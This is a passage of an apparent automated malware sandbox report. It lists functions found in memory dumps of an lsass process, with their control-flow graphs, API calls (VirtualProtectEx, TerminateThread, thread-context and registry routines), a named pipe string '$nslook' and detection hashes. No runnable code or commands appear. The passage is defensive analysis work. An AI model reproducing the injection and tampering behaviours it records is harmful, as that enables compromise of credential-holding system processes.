240b2bb89ca-240b2bb89d4 691->708 695->688 722 240b2bb899a-240b2bb89a8 call 240b2bc4348 695->722 715 240b2bb87fd-240b2bb8807 call 240b2bb8fa0 698->715 716 240b2bb8821-240b2bb882c 698->716 713 240b2bb89df-240b2bb89ef call 240b2bc4348 708->713 714 240b2bb89d6-240b2bb89dd 708->714 713->688 714->688 715->716 727 240b2bb8809-240b2bb8817 715->727 716->653 722->688 727->716 728->675 730 240b2bb87c3-240b2bb87e0 call 240b2bba89c 728->730 730->675
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 58aff0be08f7dc76270194fecfa1a5bddf324a8db837ccbc2bfa305193924b24
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: 01811621A0464586FF54AB66A8CDF9922A0FB8D78CF54892D9B484F796DF38C8C1870C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2B87AEC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 517 240b2b87aec-240b2b87af2 518 240b2b87b2d-240b2b87b37 517->518 519 240b2b87af4-240b2b87af7 517->519 522 240b2b87c54-240b2b87c69 518->522 520 240b2b87af9-240b2b87afc 519->520 521 240b2b87b21-240b2b87b60 call 240b2b882c8 519->521 523 240b2b87afe-240b2b87b01 520->523 524 240b2b87b14 __scrt_dllmain_crt_thread_attach 520->524 540 240b2b87c2e 521->540 541 240b2b87b66-240b2b87b7b call 240b2b8815c 521->541 525 240b2b87c78-240b2b87c92 call 240b2b8815c 522->525 526 240b2b87c6b 522->526 528 240b2b87b0d-240b2b87b12 call 240b2b8820c 523->528 529 240b2b87b03-240b2b87b0c 523->529 532 240b2b87b19-240b2b87b20 524->532 538 240b2b87ccb-240b2b87cfc call 240b2b88498 525->538 539 240b2b87c94-240b2b87cc9 call 240b2b88284 call 240b2b88124 call 240b2b88620 call 240b2b88438 call 240b2b8845c call 240b2b882b4 525->539 530 240b2b87c6d-240b2b87c77 526->530 528->532 551 240b2b87d0d-240b2b87d13 538->551 552 240b2b87cfe-240b2b87d04 538->552 539->530 545 240b2b87c30-240b2b87c45 540->545 549 240b2b87b81-240b2b87b92 call 240b2b881cc 541->549 550 240b2b87c46-240b2b87c53 call 240b2b88498 541->550 567 240b2b87be3-240b2b87bed call 240b2b88438 549->567 568 240b2b87b94-240b2b87bb8 call 240b2b885e4 call 240b2b88114 call 240b2b88140 call 240b2b89d00 549->568 550->522 557 240b2b87d5a-240b2b87d70 call 240b2b83320 551->557 558 240b2b87d15-240b2b87d1f 551->558 552->551 556 240b2b87d06-240b2b87d08 552->556 563 240b2b87dfd-240b2b87e0a 556->563 578 240b2b87daa-240b2b87dac 557->578 579 240b2b87d72-240b2b87d74 557->579 564 240b2b87d2b-240b2b87d39 call 240b2b93748 558->564 565 240b2b87d21-240b2b87d29 558->565 570 240b2b87d3f-240b2b87d54 call 240b2b87aec 564->570 580 240b2b87df3-240b2b87dfb 564->580 565->570 567->540 590 240b2b87bef-240b2b87bfb call 240b2b88488 567->590 568->567 620 240b2b87bba-240b2b87bc1 __scrt_dllmain_after_initialize_c 568->620 570->557 570->580 582 240b2b87dae-240b2b87db1 578->582 583 240b2b87db3-240b2b87dc8 call 240b2b87aec 578->583 579->580 587 240b2b87d76-240b2b87d98 call 240b2b83320 call 240b2b87c54 579->587 580->563 582->580 582->583 583->580 600 240b2b87dca-240b2b87dd4 583->600 587->580 614 240b2b87d9a-240b2b87da8 call 240b2b93748 587->614 607 240b2b87bfd-240b2b87c07 call 240b2b883a0 590->607 608 240b2b87c21-240b2b87c2c 590->608 605 240b2b87ddf-240b2b87def call 240b2b93748 600->605 606 240b2b87dd6-240b2b87ddd 600->606 605->580 606->580 607->608 619 240b2b87c09-240b2b87c17 607->619 608->545 614->580 619->608 620->567 622 240b2b87bc3-240b2b87be0 call 240b2b89c9c 620->622 622->567
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: 8b597d54eb5fc7d6e9b64eca6af6811637a8f7bd36bf8a37e83b1fc64afd121b
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: EA81CF6661464587FA50AB6998CDFA96399F78E78CF08441DDB0C4F3D6EE3CC8C1A708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB3C30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 221stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 733 240b2bb3c30-240b2bb3c54 734 240b2bb3c5a-240b2bb3c5f 733->734 735 240b2bb3db7-240b2bb3dba 733->735 736 240b2bb3efa-240b2bb3f16 734->736 737 240b2bb3c65-240b2bb3c69 734->737 735->736 738 240b2bb3dc0-240b2bb3dc5 735->738 739 240b2bb3c70-240b2bb3c88 737->739 738->736 740 240b2bb3dcb-240b2bb3dce 738->740 741 240b2bb3c8a-240b2bb3c9e call 240b2bba610 739->741 742 240b2bb3ca4-240b2bb3cab 739->742 743 240b2bb3dd0-240b2bb3ddf 740->743 741->742 760 240b2bb3d72-240b2bb3d9e call 240b2bb9480 741->760 747 240b2bb3cad-240b2bb3cc1 call 240b2bba610 742->747 748 240b2bb3cc7-240b2bb3cd4 742->748 745 240b2bb3dfb-240b2bb3e02 743->745 746 240b2bb3de1-240b2bb3df5 call 240b2bba610 743->746 752 240b2bb3e1e-240b2bb3e2b 745->752 753 240b2bb3e04-240b2bb3e18 call 240b2bba610 745->753 746->745 771 240b2bb3ec2-240b2bb3ee6 call 240b2bb9480 746->771 747->748 747->760 754 240b2bb3d20-240b2bb3d2e 748->754 755 240b2bb3cd6-240b2bb3cdd 748->755 756 240b2bb3e2d-240b2bb3e34 752->756 757 240b2bb3e70-240b2bb3e7e 752->757 753->752 753->771 758 240b2bb3da1-240b2bb3dac 754->758 759 240b2bb3d30-240b2bb3d37 754->759 755->754 764 240b2bb3cdf-240b2bb3ce3 755->764 756->757 766 240b2bb3e36-240b2bb3e3a 756->766 769 240b2bb3ee9-240b2bb3ef4 757->769 770 240b2bb3e80-240b2bb3e87 757->770 758->739 767 240b2bb3db2 758->767 759->758 768 240b2bb3d39-240b2bb3d3d 759->768 760->758 764->754 773 240b2bb3ce5 764->773 766->757 776 240b2bb3e3c 766->776 767->736 768->758 778 240b2bb3d3f 768->778 769->736 769->743 770->769 779 240b2bb3e89-240b2bb3e8d 770->779 771->769 774 240b2bb3cf0-240b2bb3cff 773->774 780 240b2bb3d09 lstrcmpW 774->780 781 240b2bb3d01-240b2bb3d07 lstrcmpiW 774->781 782 240b2bb3e40-240b2bb3e4f 776->782 784 240b2bb3d40-240b2bb3d4f 778->784 779->769 785 240b2bb3e8f 779->785 786 240b2bb3d0f-240b2bb3d18 780->786 781->786 787 240b2bb3e59 lstrcmpW 782->787 788 240b2bb3e51-240b2bb3e57 lstrcmpiW 782->788 789 240b2bb3d59 lstrcmpW 784->789 790 240b2bb3d51-240b2bb3d57 lstrcmpiW 784->790 791 240b2bb3e90-240b2bb3e9f 785->791 786->760 792 240b2bb3d1a-240b2bb3d1e 786->792 793 240b2bb3e5f-240b2bb3e68 787->793 788->793 794 240b2bb3d5f-240b2bb3d68 789->794 790->794 795 240b2bb3ea9 lstrcmpW 791->795 796 240b2bb3ea1-240b2bb3ea7 lstrcmpiW 791->796 792->754 792->774 793->771 797 240b2bb3e6a-240b2bb3e6e 793->797 794->760 798 240b2bb3d6a-240b2bb3d6e 794->798 799 240b2bb3eaf-240b2bb3eb8 795->799 796->799 797->757 797->782 798->784 801 240b2bb3d70 798->801 799->771 800 240b2bb3eba-240b2bb3ebe 799->800 800->791 802 240b2bb3ec0 800->802 801->758 802->769
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: 84f0738f36f0818e0b7d6e5e431691e48fe11b0d06a16fffce8992d4a7ebc084
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: 9D81A97A301A5496EB588F26E5DCB2973A0F748B88F05402EDB0A4FA94DF35D4D5C31A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB11C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135stringregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: 8ea77a832d00c1cd5c760fd4ffaa9f7b66c4af0d407b711541f64af49faac976
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: 96516D72214B8097EB64DB11F99CB9EB3A4F78DB88F044429DB994BB54DF38D1A1CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB44F0 Relevance: 10.6, APIs: 7, Instructions: 125threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 836 240b2bb44f0-240b2bb450a 837 240b2bb473a-240b2bb474b call 240b2bb83e0 836->837 838 240b2bb4510-240b2bb452a GetModuleHandleW 836->838 840 240b2bb452c-240b2bb4556 call 240b2bc4118 VirtualProtectEx 838->840 841 240b2bb4596-240b2bb45a5 838->841 840->841 849 240b2bb4558-240b2bb4590 call 240b2bc4118 VirtualProtectEx 840->849 842 240b2bb45ba-240b2bb45c1 841->842 843 240b2bb45a7-240b2bb45af TerminateThread 841->843 842->837 846 240b2bb45c7-240b2bb45f0 call 240b2bb69c0 GetCurrentThread call 240b2bb6ee0 842->846 843->842 855 240b2bb4603-240b2bb4612 846->855 856 240b2bb45f2-240b2bb45fe call 240b2bb6620 846->856 849->841 858 240b2bb4625-240b2bb4634 855->858 859 240b2bb4614-240b2bb4620 call 240b2bb6620 855->859 856->855 860 240b2bb4647-240b2bb4656 858->860 861 240b2bb4636-240b2bb4642 call 240b2bb6620 858->861 859->858 864 240b2bb4669-240b2bb4678 860->864 865 240b2bb4658-240b2bb4664 call 240b2bb6620 860->865 861->860 867 240b2bb468b-240b2bb469a 864->867 868 240b2bb467a-240b2bb4686 call 240b2bb6620 864->868 865->864 870 240b2bb46ad-240b2bb46bc 867->870 871 240b2bb469c-240b2bb46a8 call 240b2bb6620 867->871 868->867 873 240b2bb46cf-240b2bb46de 870->873 874 240b2bb46be-240b2bb46ca call 240b2bb6620 870->874 871->870 876 240b2bb46f1-240b2bb4700 873->876 877 240b2bb46e0-240b2bb46ec call 240b2bb6620 873->877 874->873 879 240b2bb4713-240b2bb4722 876->879 880 240b2bb4702-240b2bb470e call 240b2bb6620 876->880 877->876 882 240b2bb4735 call 240b2bb6a30 879->882 883 240b2bb4724-240b2bb4730 call 240b2bb6620 879->883 880->879 882->837 883->882
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: ba0114cf4e94f0fd01f91b147343ee2320e116306217b9bdfacf3d88b846a27b
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 0561F725625B4581EE95DF15F4DCB9923A0FB4C788F44142DAB8E0B7A5EF38C588C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BBA140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 886 240b2bba140-240b2bba17d 887 240b2bba26d 886->887 888 240b2bba183-240b2bba186 886->888 889 240b2bba26f-240b2bba28b 887->889 888->889 890 240b2bba18c 888->890 891 240b2bba18f 890->891 892 240b2bba265 891->892 893 240b2bba195-240b2bba1a3 891->893 892->887 894 240b2bba1b0-240b2bba1cf LoadLibraryExW 893->894 895 240b2bba1a5-240b2bba1a8 893->895 898 240b2bba1d1-240b2bba1da call 240b2bc4070 894->898 899 240b2bba227-240b2bba23c 894->899 896 240b2bba1ae 895->896 897 240b2bba247-240b2bba256 GetProcAddress 895->897 900 240b2bba21b-240b2bba222 896->900 897->892 903 240b2bba258-240b2bba263 897->903 905 240b2bba209-240b2bba213 898->905 906 240b2bba1dc-240b2bba1f1 call 240b2bbb838 898->906 899->897 902 240b2bba23e-240b2bba241 FreeLibrary 899->902 900->891 902->897 903->889 905->900 906->905 909 240b2bba1f3-240b2bba207 LoadLibraryExW 906->909 909->899 909->905
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 407aae76d2b6a61b93dc32e7542d18c9b53626ef23f20a96690c7a35e9ef659a
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: 7D31D521B12B4095EE569B06A88CF9963A4F75CFACF69452DDF690F791EF38C0C48308
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB2E38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: dc7c7a4027ceea7bb38ae882a01c016e8a7f67472f317638fc2dfd4d9a14736c
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: 9B319A663006418AEB288B26D4DCBA97772FB4CB8CF444019CF0A4F798DF38C986C308
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB27E9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: 5f8c6942e31cdb37ffa6b4ea8b13cf0e1180d39b96592aa9b2b145ae0690042f
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 46317E2660468492EF64AF25E8DCBA97360FB4CB88F44401DCF4A4B694DF38D58AC709
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BC295C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: 1400b188e2c8f9f5262fabc8ca190b0768661122814c56924e9a44837d3d1f75
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: CE118F22310B4086E7548B56F88CB1976B0F78CFF8F144229EB5E8B7A4CF78C9948748
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB19F0 Relevance: 10.3, APIs: 8, Instructions: 286stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: f2faaf32269abfe26da97f746682e8ac56b654f183422956acc082096e212c60
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: D0C13A36722A4486EBA4CF1AD1CCB2973A1F39CB98F598419CB194B790DF35D8D1C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB6A40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction ID: 08fefa85f01c6c7c64e24bee5712529b4d4b352143ab9c5101c22843d6c8b675
                            • Opcode Fuzzy Hash: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction Fuzzy Hash: 2FD16A76209B8885DA709B16E4DC75AB7B0F3CCB88F54411AEB8D4BBA5DF38C591CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BBACFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: ba5e4b32bd0f995bd507b5271cf72f3e1503205cba38542ec332761640530dba
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: 7EF03061721A4082FF589B60E8DDBA92374EB8CB59F44241EEB4B4E665DF3CC5C8C718
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB5FE0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction ID: 441f54a0eb2e66258e734fd0b5d0d80732c2ac0c53cdc1db346244779bd950fd
                            • Opcode Fuzzy Hash: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction Fuzzy Hash: 0002CC32519B8486EB60CB55E49C75AB7B0F3C8798F105019EB8E87BA9DF7DC894CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BC194C Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: 5d846ac24dcb18f50906e3af5791fd1b77f6ba8a42add3e75f8a9824043836c5
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 93818E22620A1489FB14DB65D8DCBAD27A0F74CB9CF44421AEF5A6B795DF3484C2C728
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB6620 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction ID: e232bb0fb573ffeb00f639744c2c1219f4c50d6209540319722f44bb60852fb6
                            • Opcode Fuzzy Hash: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction Fuzzy Hash: 8C616B76519A4486E6608B16E49CB5AB7A0F38C788F10511EEB8E4BBA4DF78C990CF04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BC2C78 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 0d8a3b26d4a35de414f976303527f907e7ef6524ff95a158df72a7caff83e744
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 6711CC23A54A4541F758112CE8DEB663140EBEC37CF94462DAF7B5E7EA8E3988C1820D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2B92078 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: ee0cc1c35b284aaa0ba4e07b8d95da65153a3a9668daaabd7a50fddbc6349172
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: A911A322E54A5002F66C1129E4DEBA53440EB5E37CF55462CEF661F3DA8E3D88C19608
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2B8DD54 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: bdcf7830062aea700f3d490ffa9ef70f763b8d5f97e30f8f28fa71962fd0312d
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: 8561B23260064682FE659B35A4DCB6E66A9F79D78DF14041EDB0E0F7A5DF34C8C19328
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2B89A10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: 4649f9f997514f323207ffa1495ee601424e6e680e8526c3ad753c4b7871cd35
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
